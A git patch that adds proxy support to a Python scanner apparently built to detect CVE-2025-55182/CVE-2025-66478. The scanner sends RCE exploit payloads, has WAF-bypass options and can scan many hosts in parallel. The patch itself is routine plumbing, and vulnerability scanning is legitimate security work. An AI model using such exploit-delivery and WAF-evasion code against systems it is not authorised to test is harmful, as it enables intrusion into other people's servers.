From e1a9b7361bda83d728d280f4172c8acffd8d3b83 Mon Sep 17 00:00:00 2001 From: AliHzSec Date: Tue, 9 Dec 2025 12:08:34 +0330 Subject: [PATCH] feat: add HTTP/HTTPS proxy support --- .gitignore | 2 ++ scanner.py | 38 ++++++++++++++++++++++++++++---------- 2 files changed, 30 insertions(+), 10 deletions(-) diff --git a/.gitignore b/.gitignore index 9dea3eb..05147c1 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,3 @@ dev/ +venv/ +.venv/ \ No newline at end of file diff --git a/scanner.py b/scanner.py index 9d0bdb2..2169720 100755 --- a/scanner.py +++ b/scanner.py @@ -203,18 +203,23 @@ def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypas return body, content_type -def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10) -> str: +def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10, proxy: Optional[str] = None) -> str: """Follow redirects only if they stay on the same host.""" current_url = url original_host = urlparse(url).netloc + proxies = None + if proxy: + proxies = {"http": proxy, "https": proxy} + for _ in range(max_redirects): try: response = requests.head( current_url, timeout=timeout, verify=verify_ssl, - allow_redirects=False + allow_redirects=False, + proxies=proxies ) if response.status_code in (301, 302, 303, 307, 308): location = response.headers.get("Location") @@ -239,19 +244,25 @@ def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: i return current_url -def send_payload(target_url: str, headers: dict, body: str, timeout: int, verify_ssl: bool) -> Tuple[Optional[requests.Response], Optional[str]]: +def send_payload(target_url: str, headers: dict, body: str, timeout: int, verify_ssl: bool, proxy: Optional[str] = None) -> Tuple[Optional[requests.Response], Optional[str]]: """Send the exploit payload to a URL. Returns (response, error).""" try: # Encode body as bytes to ensure proper Content-Length calculation # and avoid potential encoding issues with the HTTP client body_bytes = body.encode('utf-8') if isinstance(body, str) else body + + proxies = None + if proxy: + proxies = {"http": proxy, "https": proxy} + response = requests.post( target_url, headers=headers, data=body_bytes, timeout=timeout, verify=verify_ssl, - allow_redirects=False + allow_redirects=False, + proxies=proxies ) return response, None except requests.exceptions.SSLError as e: @@ -290,7 +301,7 @@ def is_vulnerable_rce_check(response: requests.Response) -> bool: return bool(re.search(r'.*/login\?a=11111.*', redirect_header)) -def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, follow_redirects: bool = True, custom_headers: Optional[dict[str, str]] = None, safe_check: bool = False, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128, vercel_waf_bypass: bool = False, paths: Optional[list[str]] = None) -> dict: +def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, follow_redirects: bool = True, custom_headers: Optional[dict[str, str]] = None, safe_check: bool = False, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128, vercel_waf_bypass: bool = False, paths: Optional[list[str]] = None, proxy: Optional[str] = None) -> dict: """ Check if a host is vulnerable to CVE-2025-55182/CVE-2025-66478. @@ -379,7 +390,7 @@ def build_response_str(resp: requests.Response) -> str: result["final_url"] = test_url result["request"] = build_request_str(test_url) - response, error = send_payload(test_url, headers, body, timeout, verify_ssl) + response, error = send_payload(test_url, headers, body, timeout, verify_ssl, proxy) if error: # In RCE mode, timeouts indicate not vulnerable (patched servers hang) @@ -406,10 +417,10 @@ def build_response_str(resp: requests.Response) -> str: # Path not vulnerable - try redirect path if enabled if follow_redirects: try: - redirect_url = resolve_redirects(test_url, timeout, verify_ssl) + redirect_url = resolve_redirects(test_url, timeout, verify_ssl, proxy=proxy) if redirect_url != test_url: # Different path, test it - response, error = send_payload(redirect_url, headers, body, timeout, verify_ssl) + response, error = send_payload(redirect_url, headers, body, timeout, verify_ssl, proxy) if error: # Continue to next path @@ -649,6 +660,11 @@ def main(): help="File containing list of paths to test (one per line, e.g., '/_next', '/api')" ) + parser.add_argument( + "-p", "--proxy", + help="HTTP/HTTPS proxy URL (e.g., http://proxy.example.com:8080 or https://proxy.example.com:8443)" + ) + args = parser.parse_args() if args.no_color or not sys.stdout.isatty(): @@ -697,6 +713,8 @@ def main(): print(colorize(f"[*] Testing {len(paths)} path(s): {', '.join(paths)}", Colors.CYAN)) print(colorize(f"[*] Using {args.threads} thread(s)", Colors.CYAN)) print(colorize(f"[*] Timeout: {timeout}s", Colors.CYAN)) + if args.proxy: + print(colorize(f"[*] Proxy: {args.proxy}", Colors.CYAN)) if args.safe_check: print(colorize("[*] Using safe side-channel check", Colors.CYAN)) else: @@ -723,7 +741,7 @@ def main(): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if len(hosts) == 1: - result = check_vulnerability(hosts[0], timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, paths=paths) + result = check_vulnerability(hosts[0], timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, paths=paths, proxy=args.proxy) results.append(result) if not args.quiet or result["vulnerable"]: print_result(result, args.verbose) @@ -732,7 +750,7 @@ def main(): else: with ThreadPoolExecutor(max_workers=args.threads) as executor: futures = { - executor.submit(check_vulnerability, host, timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, paths=paths): host + executor.submit(check_vulnerability, host, timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass, paths=paths, proxy=args.proxy): host for host in hosts }